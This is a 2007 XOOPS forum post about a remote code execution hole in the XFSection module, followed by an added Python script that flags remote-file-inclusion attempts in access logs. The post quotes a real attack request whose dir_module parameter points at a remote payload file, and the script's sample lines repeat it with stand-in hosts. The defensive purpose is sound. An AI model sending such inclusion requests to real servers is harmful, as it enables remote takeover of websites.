PEAK XOOPS - Re: New hack that is using XFSection

Posted on 2007/6/9 4:49
GIJOE  Posts: 4110
hi Xooby.

This is not a new but a well-known fatal hole.

minahito had already warned ohwada about 3 years ago that XF-Section has "$_GET extraction".
But ohwada never checked the code, and then a fatal vulnerability was opened in spring 2006.

Thus, I insist "Don't install modules made by such authors".


07.218.231.178 - - [08/Jun/2007:11:42:57 +0100] "GET /modules/xfsection/modify.php?dir_module=http://www.insanmistik.org/x1.txt? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"

This is a typical and dull "remote code execution".

Protector must have warned the administrator to "turn allow_url_fopen off".
All Protector can do is just warn.

Or should Protector investigate whether such vulnerable modules are installed?


And you'd better distinguish between "hack" and "crack".
"Hacking" never means illegal behaviors.
Votes:2 Average:10.00
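
A log check for the request pattern quoted in the post above, added here as an example; it is not part of the original post or of Protector. It flags access-log entries where a query parameter's value is itself a remote URL, as `dir_module` is in the quoted entry. The function name and the sample lines (documentation IPs and hosts) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Constructed sample lines, modelled on the entry quoted in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jun/2007:11:42:57 +0100] "GET /modules/xfsection/modify.php'
    '?dir_module=http://attacker.example/x1.txt? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"',
    '192.0.2.11 - - [08/Jun/2007:11:43:02 +0100] "GET /modules/xfsection/modify.php'
    '?dir_module=ftp%3A%2F%2Fattacker.example%2Fx1.txt HTTP/1.1" 200 1024 "-" "-"',
    '198.51.100.7 - - [08/Jun/2007:11:44:10 +0100] "GET /modules/news/article.php'
    '?storyid=12 HTTP/1.1" 200 5120 "http://www.example.org/" "Mozilla/5.0"',
    'not an access log line',
]

def find_rfi_attempts(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a parseable access-log entry
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                findings.append({
                    "host": m.group("host"),
                    "path": target.path,
                    "param": param,
                    "value": value,
                    "status": m.group("status"),
                    # 2xx means the script ran with this input: triage first
                    "served": m.group("status").startswith("2"),
                })
    return findings

if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```

Parameters that legitimately carry URLs (redirect targets, for instance) will also match, so findings are leads to triage against the installed modules, not verdicts.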
